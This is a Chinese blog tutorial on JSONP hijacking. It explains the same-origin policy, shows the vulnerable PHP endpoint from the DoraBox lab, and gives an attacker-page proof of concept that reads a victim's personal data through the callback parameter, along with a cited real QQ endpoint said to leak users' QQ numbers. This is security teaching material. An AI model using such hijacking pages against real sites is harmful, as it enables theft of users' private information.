Jsonp跨域漏洞浅析

最新推荐文章于 2025-04-02 23:18:56 发布
原创 最新推荐文章于 2025-04-02 23:18:56 发布
· 1.3k 阅读 · 2 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#跨域漏洞 #json劫持

为什么要用到jsonp跨域?

同源策略:协议、域名、端口都相同,是一种安全策略,不同源的客户端脚本在没有明确授权的情况下,不能读取对方资源。
在这里插入图片描述
在这里插入图片描述
如何解决跨域(目前我掌握的有两种手段

(1)JSONP方式
(2)跨域资源共享(CORS)cors跨域漏洞浅析

Json一般长这样

{“name”:“aufeng”, “blog”:“https://blog.youkuaiyun.com/weixin_41598660”}

它是一个非官方的协议,它允许在服务器端集成Script tags返回至客户端,通过javascript callback的形式实现跨域访问(这仅仅是JSONP简单的实现形式)。JSONP是一种非正式传输协议,该协议的一个要点就是允许用户传递一个callback参数给服务端,然后服务端返回数据时会将这个callback参数作为函数名来包裹住JSON数据,这样客户端就可以随意定制自己的函数来自动处理返回数据了。

例如

http://www.dorabox.com/csrf/jsonp.php?callback=test

在这里插入图片描述
其中callback接口或许能插入xss的payload

Jsonp劫持漏洞复现

思维导图(个人理解
在这里插入图片描述
Phpstudy并且设置好网站域名攻击者为aufeng.com,漏洞页面为dorabox.com
在这里插入图片描述
搭建漏洞环境 dorabox,https://github.com/Acmesec/DoraBox
在这里插入图片描述
Json劫持漏洞源码

<?php
	include "../class/function.class.php";
	$reqMethod = "GET";
	$reqValue = "callback";
	$p = new Func($reqMethod, $reqValue);
	$info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => 'admin@gh0st.cn', 'address' => '中华人民共和国', 'sex' => 'Cool Man');
	if(!@$_GET['callback']){
		echo $p -> con_function('json_encode',$info);
	}else{
		$callback = htmlspecialchars($_GET['callback']);
		echo "{$callback}(" . $p -> con_function('json_encode',$info) . ")";
	}
?>

漏洞页面
在这里插入图片描述
编写exp

<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持测试</title>
</head>
<body>
<script type="text/javascript">
function vulkey(data){alert(JSON.stringify(data));}</script>

<script src="http://www.DoraBox.com/csrf/jsonp.php?callback=vulkey"></script>
</body>
</html>

构造的攻击链接为:http://www.aufeng.com/json2.html ,假设受害者点击该页面,攻击者将会获取受害者敏感信息。
在这里插入图片描述

分析:

但是如上的漏洞复现为什么成功?是因为漏洞服务器并没有对攻击者构造的页面请求进行referer的验证
在这里插入图片描述例如上面攻击的请求包里面,referer值是攻击者的构造页面,但是漏洞服务器并没有对来源的页面进行一个验证,导致了攻击者能获取到受害者的敏感信息。
(有的返回json数据会验证referer是不是从自己规定的域过来的)
在这里插入图片描述
常见json劫持exp
https://www.cnblogs.com/xiaozi/p/9963523.html
参考文章
https://www.cnblogs.com/xiaoan0705/p/8625454.html

乌云案例
1
登录QQ,访问http://dir.minigame.qq.com/cgi-bin/yxs/GetYxsRegTime?callback=callback&dstuin=泄露用户QQ
在这里插入图片描述

2
在这里插入图片描述

浅谈JSONP漏洞
weixin_39664643的博客
10-11 3090
浅谈JSONP漏洞 CSRF(Cross site request forgery)站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP资源读取 CORS资源读取 当持有敏感资源数据的服务器没
jsonp漏洞
qq_44768719的博客
04-21 311
:协议,名,端口三者为,既三者之间有一个不同即为的方法: jsonp(只接受get请求) 资源共享(cors) 原理解析:个人理解:json可以实现,所以我们可以构造代码去对服务器进行请求,获取他的信息。(调用js文件时不受的影响,凡是拥有src属性的标签都有能力) exp: <html> <head> <meta charset="utf-8"> <title>JSONP劫持测试</title> </hea
JSONP访问漏洞
最新发布
zj2084的博客
04-02 747
当在list-json.html页面中,直接构造以下Payload,则会导致弹窗如果payload是这样的话,也会给我们进行弹窗,说明存在XSS漏洞基于这个XSS漏洞,我们就可以去利用这个漏洞我们可以试着去让它弹出当前页面的Cookie,成功弹出Cookie我们也可以让它做一个登录,成功登录然后我们再通过XSS漏洞将Sesssion ID弹出来,说明它并没有对当前的Cookie设置http-only的属性,让我们的JavaScript是可以读取到的。
JSONP漏洞详解
m0_64481831的博客
03-15 1490
JSONP是基于JSON格式的为解决请求资源而产生的解决方案。实现的基本原理就是动态创建标签,然后利用标签的src不受同源策略约束来获取数据。JSONP有两部分组成:回调函数和数据。回调函数就是当响应到来时应该在页面中调用的函数。数据就是传入回调函数中的JSON数据。
浅析jsopn请求原理及cors(资源共享)的完美解决方法
12-07
JSONP的安全性较低,因为它完全依赖于服务器正确地构建和返回JavaScript代码,任何错误都可能导致脚本注入漏洞。而CORS提供了更多的控制和安全性,服务器可以明确指定哪些源可以访问,甚至可以控制允许的HTTP方法、...
我理解的回调与同源方法执行漏洞(SOME)浅析
9ian1i
12-23 2108
0x00 before以前一直对回调有些迷糊,似懂非懂,虽然能明白用法和原理,但总有些小疑问,比如,为啥偏要用回调。今天集中看了很多博客,再配合上SOME的理解,感觉收获颇多,故给大家一起分享。0x01 什么是JS的回调函数见网上有人说:函数a有一个参数,这个参数是个函数b,当函数a执行完以后执行函数b。那么这个过程就叫回调。其实并不全对,函数a执行过程中执行了函数b,那也是回调。在我觉得回调的关键
【网络安全】浅析原理及如何实现
wuli1024的博客
12-14 1365
我们在解决一个问题的时候应该先去了解这个问题是如何产生的,为什么会有的存在呢?其实,最终的罪魁祸首都是浏览器的同源策略,浏览器的同源策略限制我们只能在相同的协议、IP地址、端口号相同,如果有任何一个不通,都不能相互的获取数据。并且,http和https之间也存在,因为https一般采用的是443端口,http采用的是80端口或者其他。同源策略是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,浏览器很容易受到XSS、CSRF等攻击。
jsonp漏洞
weixin_45682070的博客
02-04 282
jsonp原理 ajax请求受同源策略影响,不允许进行请求,而script标签src属性中的链接却可以访问的js脚本,利用这个特性,服务端不再返回JSON格式的数据,而是返回一段调用某个函数的js代码,在src中进行了调用,这样实现了。 实现: 1:构造jsonp.php文件 下面使用JSONP,将前端代码中的ajax请求去掉,添加了一个script标签,标签的src指向了另一个下的remote.js脚本 <!DOCTYPE html> <html> <head&
cors_漏洞JSONP和CORS资源共享
weixin_39761880的博客
11-23 276
进入正文之前,我们先来解决个小问题,什么是:指的是浏览器不能执行其它网站的脚本,它是由浏览器的同源策略造成的,是浏览器的安全限制!常见的两种方式,分别是JSONP和CORS。今天i春秋以JSONP和CORS这两个知识点,分享一篇比较基础的漏洞知识点,希望能够抛砖引玉。JSONPJSONPJSON with padding),是一种利用HTML中<script>&...
JSONP漏洞分析及利用方式
ak.Gh0st的博客
11-02 1717
jSONP 的最基本的原理是:动态添加一个< script >标签,而 script 标签的 src 属性是没有的限制的。由于同源策略的限制,XmlHttpRequest 只允许请求当前源(名、协议、端口都相同)的资源,如果要进行请求, 我们可以通过使用 html 的 script 标记来进行请求,并在响应中返回要执行的 script 代码,其中可以直接使用 JSON 传递 javascript 对象。
生命在于学习——Jsonp漏洞
易水哲的博客
09-05 1706
Jsonp学习笔记记录。
一次实战之JSONP 漏洞
战神/calmness的博客
01-03 1482
描述 Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的名(网站)那获取资料,即读取数据。 为什么我们从不同的(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。 同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。 传入callback 值会在结果里面直接返回。因此,如果该参数过滤不严格。可以随便输入:callback值为:alert(‘1’);parse
一文看懂JSONP原理和应用
热门推荐
Mr.赵的专栏
09-27 9万+
什么是JSONP首先提一下JSON这个概念,JSON是一种轻量级的数据传输格式,被广泛应用于当前Web应用中。JSON格式数据的编码和解析基本在所有主流语言中都被实现,所以现在大部分前后端分离的架构都以JSON格式进行数据的传输。那么JSONP是什么呢? 首先抛出浏览器同源策略这个概念,为了保证用户访问的安全,现代浏览器使用了同源策略,即不允许访问非同源的页面,详细的概念大家可以自行百度。这里大家
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7807
​介绍 JSONPJSON with Padding)是 json 的一种"使用模式",可以让网页从别的名(网站)那获取资料,即读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现读取数据。 更通俗的说法:JSONP 就是利用<script>标签的能力实现数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
第81篇:JSONP劫持漏洞获取敏感信息原理、复现与坑点总结
ABC_123的博客
11-25 2652
Part1 前言大家好,我是ABC_123。今天我们研究一下JSONP劫持漏洞,早些年这个漏洞主要被攻击者用来窃取个人信息,如姓名、身份证号、家庭住址等,现在更多的用于蜜罐之中,间接溯源红队攻击者的个人身份。好多朋友至今对这个漏洞理解不深刻,能发现能利用,但是就是不明白原理,有时候别人能复现成功,但是自己却怎么都复现成功。今天ABC_123搭建一个tomcat环境,用java代码写了几个ser...
jsonp访问漏洞
05-10
JSONP (JSON with Padding) 是一种访问数据的方式,它利用了 script 标签不受同源策略限制的特性,可以通过动态创建 script 标签的方式,向另一个名下的服务器发送 GET 请求,获取返回的数据。 JSONP 的实现过程中存在一定的安全风险,主要原因是它需要在客户端动态创建 script 标签,而 script 标签可以执行任意的 JavaScript 代码,所以攻击者可以利用 JSONP漏洞进行 XSS 攻击等恶意行为。 攻击者可以通过修改 JSONP 请求中的回调函数名,来执行自己构造的恶意脚本代码。因此,在使用 JSONP 进行访问时,需要谨慎处理回调函数名,避免被攻击者利用。 为了避免 JSONP 漏洞的风险,可以采用其他技术,如 CORS、WebSocket 等。同时,在使用 JSONP 进行访问时,建议使用 HTTPS 协议,以保障数据传输的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值